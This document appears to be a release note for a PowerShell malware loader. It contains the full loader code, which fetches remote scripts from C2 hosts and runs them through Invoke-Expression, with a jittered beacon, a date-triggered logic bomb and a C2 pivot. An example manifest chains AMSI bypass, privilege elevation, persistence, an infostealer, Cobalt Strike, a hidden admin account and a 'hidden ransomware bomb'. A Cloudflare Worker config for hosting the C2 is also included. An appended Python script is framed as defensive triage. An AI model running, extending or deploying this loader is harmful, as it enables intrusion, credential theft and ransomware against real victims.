
State Machine Upgrades

Support for state-machine pivots (transfer of control from one state machine to another), i.e. "bank robberies"

Refactored state machine code

# 1. Configuration
$manifestUri  = "https://c2-original/status.txt"
$TaskTracker  = [hashtable]::Synchronized(@{}) 
$RunspacePool = [runspacefactory]::CreateRunspacePool(1, 15)
$RunspacePool.Open()

$JobBlock = {
    param($Uri, $Name, $Tracker)
    try {
        if ($Uri -like "INTERNAL_SLEEP*") {
            Start-Sleep -Seconds ([int]($Uri -split '_')[-1])
        } else {
            Invoke-RestMethod -Uri $Uri -UseBasicParsing | Invoke-Expression
        }
        $Tracker[$Name] = "Completed"
    } catch { $Tracker[$Name] = "Failed" }
}

while ($true) {
    try {
        $raw = (Invoke-RestMethod -Uri $manifestUri -UseBasicParsing).Trim()
        $rows = $raw -split '\r?\n' | Where-Object { $_ -match ',' -and $_ -notlike '#*' }

        foreach ($row in $rows) {
            $cols = $row -split ',' | ForEach-Object { $_.Trim() }
            
            # --- HYBRID PARSER ---
            if ($cols.Count -lt 8) { continue } # Minimum 8 required
            
            $name       = $cols[0]
            $isEnabled  = $cols[1] -match "TRUE|1"
            $uri        = $cols[2]
            $isParallel = $cols[3] -match "TRUE|1"
            $hasDep     = $cols[5] -eq "DEPENDS"
            $depName    = $cols[7]
            
            # Auto-fill defaults for the new advanced columns if they are missing
            $targetDate = if ($cols.Count -ge 9) { $cols[8] } else { "NULL" }
            $taskType   = if ($cols.Count -ge 10) { $cols[9] } else { "TASK" }

            # 2. Guard: Already done?
            if (-not $isEnabled -or $TaskTracker.ContainsKey($name)) { continue }

            # --- THE GATES ---

            # A. Logic Bomb / Time Gate
            if ($targetDate -ne "NULL") {
                try {
                    $dt = [DateTime]::ParseExact($targetDate, "yyyy-MM-dd HH:mm", $null)
                    if ((Get-Date) -lt $dt) { continue }
                } catch { continue } # Bad date format? Skip it.
            }

            # B. Dependency Gate
            if ($hasDep -and $TaskTracker[$depName] -ne "Completed") { continue }

            # --- SPECIAL MODES ---

            if ($taskType -eq "DETONATE") { exit }

            if ($taskType -eq "SWITCH") {
                Write-Host "[!] PIVOTING C2: $uri" -ForegroundColor Yellow
                $manifestUri = $uri
                $TaskTracker.Clear()
                break # Leave the row loop; the next fetch (now from the new URI) happens after the heartbeat sleep below
            }

            # --- EXECUTION ---
            $TaskTracker[$name] = "Running"
            $ps = [powershell]::Create().AddScript($JobBlock).AddArgument($uri).AddArgument($name).AddArgument($TaskTracker)
            $ps.RunspacePool = $RunspacePool
            $handle = $ps.BeginInvoke()

            if (-not $isParallel) {
                while ($TaskTracker[$name] -eq "Running") { Start-Sleep -Milliseconds 500 }
            }
        }
    } catch { Start-Sleep -Seconds 60 }

    # Jittered Heartbeat (Approx 4 hours)
    Start-Sleep -Seconds (14400 + (Get-Random -Min 0 -Max 600))
}

Example config

#NAME,ENABLED,URI,PARALLEL,LABEL,DEP_TYPE,DEP_ENABLED,DEP_NAME,TARGET_DATE,TASK_TYPE  (last two optional; default NULL and TASK)
AMSIBYPASS,TRUE,https://c2/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
AUTOELEVATE,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
REGPERSIST,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
PATCHER,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
REFLECTEDINFOSTEALER,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
RUBEUSPIVOT,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
PIVOT,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
PSEXEC,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
COBALTSTRIKE,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
ZTINSTALL,TRUE,https://c2-original/payloadstage.ps1,TRUE,ON,NONE,FALSE,NULL
ADDADMIN,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE
WAIT_STAGE,TRUE,INTERNAL_SLEEP_600,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE
# Hidden ransomware bomb
STAGE2_UPGRADE,TRUE,https://c2-second-stage-logic-bomb/status.txt,FALSE,ON,NONE,FALSE,NULL,2026-05-01 00:00,SWITCH
FILELESSKERNELEXPLOIT,TRUE,https://c2-original/fileless-kernelexploitpayloadstage.ps1,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE

New features

This row sleeps for 600 seconds (INTERNAL_SLEEP_600) once AUTOELEVATE has completed. Because PARALLEL is FALSE, the dispatcher blocks on it, so the rows after it in the same pass do not start until the sleep ends:

WAIT_STAGE,TRUE,INTERNAL_SLEEP_600,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE

This row is a state-machine pivot: it is skipped until the TARGET_DATE (2026-05-01 00:00) has passed, and then the loader replaces its manifest URI with the row's URI, clears the task tracker, leaves the row loop, and fetches the new manifest on its next heartbeat, so control transfers to the second state machine:

STAGE2_UPGRADE,TRUE,https://c2-second-stage-logic-bomb/status.txt,FALSE,ON,NONE,FALSE,NULL,2026-05-01 00:00,SWITCH
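The manifest format and the gates above, replayed from the defender's side. This is an added example, not the loader's code or the author's: a Python triage script an analyst can run on a captured status.txt to list which rows are time-gated (the logic-bomb calendar), which rows are SWITCH or DETONATE, and which stages a single pass would dispatch at a given date and tracker state. It mirrors the loader's parsing rules (regex TRUE|1 flags, case-insensitive DEPENDS and task types, yyyy-MM-dd HH:mm dates, rows with fewer than 8 columns dropped, INTERNAL_SLEEP_<n> pseudo-URIs). The sample manifest is constructed from the example config plus one BADDATE row; the assumption that every dispatched non-parallel stage completes successfully is the script's, not the loader's.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample manifest: a few rows copied from the example config above,
# plus a BADDATE row whose TARGET_DATE the loader cannot parse.
SAMPLE_MANIFEST = """\
#NAME,ENABLED,URI,PARALLEL,LABEL,DEP_TYPE,DEP_ENABLED,DEP_NAME,TARGET_DATE,TASK_TYPE
AMSIBYPASS,TRUE,https://c2/payloadstage.ps1,FALSE,ON,NONE,FALSE,NULL
ADDADMIN,TRUE,https://c2-original/payloadstage.ps1,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE
WAIT_STAGE,TRUE,INTERNAL_SLEEP_600,FALSE,ON,DEPENDS,TRUE,AUTOELEVATE
# Hidden ransomware bomb
STAGE2_UPGRADE,TRUE,https://c2-second-stage-logic-bomb/status.txt,FALSE,ON,NONE,FALSE,NULL,2026-05-01 00:00,SWITCH
BADDATE,TRUE,https://c2-original/x.ps1,FALSE,ON,NONE,FALSE,NULL,next-tuesday,TASK
"""


@dataclass
class Task:
    name: str
    enabled: bool
    uri: str
    parallel: bool
    depends_on: Optional[str]        # DEP_NAME, only when DEP_TYPE is DEPENDS
    target_date: Optional[datetime]  # parsed TARGET_DATE; None when NULL/absent
    bad_date: bool                   # TARGET_DATE present but unparseable
    task_type: str                   # TASK, SWITCH or DETONATE (upper-cased)
    sleep_seconds: Optional[int]     # n from an INTERNAL_SLEEP_<n> pseudo-URI


def manifest_time(s: str) -> datetime:
    """The loader's date format: [DateTime]::ParseExact(s, 'yyyy-MM-dd HH:mm')."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


def _flag(col: str) -> bool:
    # The loader uses -match "TRUE|1": a case-insensitive regex *search*, so
    # "true", "1", and also "10" or "x1" all count as set.
    return re.search(r"TRUE|1", col, re.IGNORECASE) is not None


def parse_manifest(text: str) -> List[Task]:
    """Parse status.txt the way the loader does: '#' lines and lines without a
    comma are ignored, rows with fewer than 8 columns dropped, columns 9/10 optional."""
    tasks: List[Task] = []
    for line in text.splitlines():
        if "," not in line or line.startswith("#"):
            continue
        cols = [c.strip() for c in line.split(",")]
        if len(cols) < 8:
            continue
        date_col = cols[8] if len(cols) >= 9 else "NULL"
        target, bad = None, False
        if date_col.upper() != "NULL":
            try:
                target = manifest_time(date_col)
            except ValueError:
                bad = True  # the loader's catch { continue }: row never fires
        uri, sleep = cols[2], None
        if uri.upper().startswith("INTERNAL_SLEEP"):
            tail = uri.split("_")[-1]
            sleep = int(tail) if tail.isdigit() else None  # [int] cast would throw
        tasks.append(Task(
            name=cols[0], enabled=_flag(cols[1]), uri=uri, parallel=_flag(cols[3]),
            depends_on=cols[7] if cols[5].upper() == "DEPENDS" else None,
            target_date=target, bad_date=bad,
            task_type=(cols[9] if len(cols) >= 10 else "TASK").upper(),
            sleep_seconds=sleep))
    return tasks


def time_gated(tasks: List[Task]) -> List[Tuple[datetime, str, str]]:
    """Rows that only fire after a wall-clock date: the logic-bomb calendar."""
    return sorted((t.target_date, t.name, t.task_type) for t in tasks if t.target_date)


def simulate_pass(tasks: List[Task], now: datetime, tracker: Dict[str, str]) -> list:
    """Replay one pass of the loader's row loop at time `now` with the given
    tracker (name -> Running/Completed/Failed), mutating it like the loader does.
    Returns ('run'|'switch'|'detonate', name, uri) actions in order.
    Assumption (script's own): a dispatched non-parallel stage completes
    successfully before the next row; a parallel one stays Running for the pass."""
    actions = []
    for t in tasks:
        if not t.enabled or t.name in tracker or t.bad_date:
            continue
        if t.target_date is not None and now < t.target_date:
            continue                                        # time gate closed
        if t.depends_on is not None and tracker.get(t.depends_on) != "Completed":
            continue                                        # dependency gate
        if t.task_type == "DETONATE":
            actions.append(("detonate", t.name, None))
            break                                           # loader process exits
        if t.task_type == "SWITCH":
            actions.append(("switch", t.name, t.uri))
            tracker.clear()                                 # $TaskTracker.Clear()
            break                                           # pivot to new manifest
        actions.append(("run", t.name, t.uri))
        tracker[t.name] = "Running" if t.parallel else "Completed"
    return actions


if __name__ == "__main__":
    tasks = parse_manifest(SAMPLE_MANIFEST)
    print("time-gated rows:", time_gated(tasks))
    tracker: Dict[str, str] = {"AUTOELEVATE": "Completed"}
    print(simulate_pass(tasks, manifest_time("2026-05-01 00:00"), tracker))
```

Two loader quirks an analyst should know are reproduced here: the -match "TRUE|1" test accepts any value containing a 1, and a row with an unparseable TARGET_DATE is silently skipped on every pass rather than reported, so a typo in the date column disables a stage for good.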

Source of the wrangler.toml file (wrangler defines the first-stage Cloudflare Worker; a plain wrangler deploy publishes it):

name = "c2-original"
main = "src/index.js"
compatibility_date = "2026-04-30"

# This handles your PowerShell and Text imports
[[rules]]
type = "Text"
globs = ["**/*.ps1", "**/*.txt"]
fallthrough = true

Repeat the same for the second-stage logic-bomb worker.
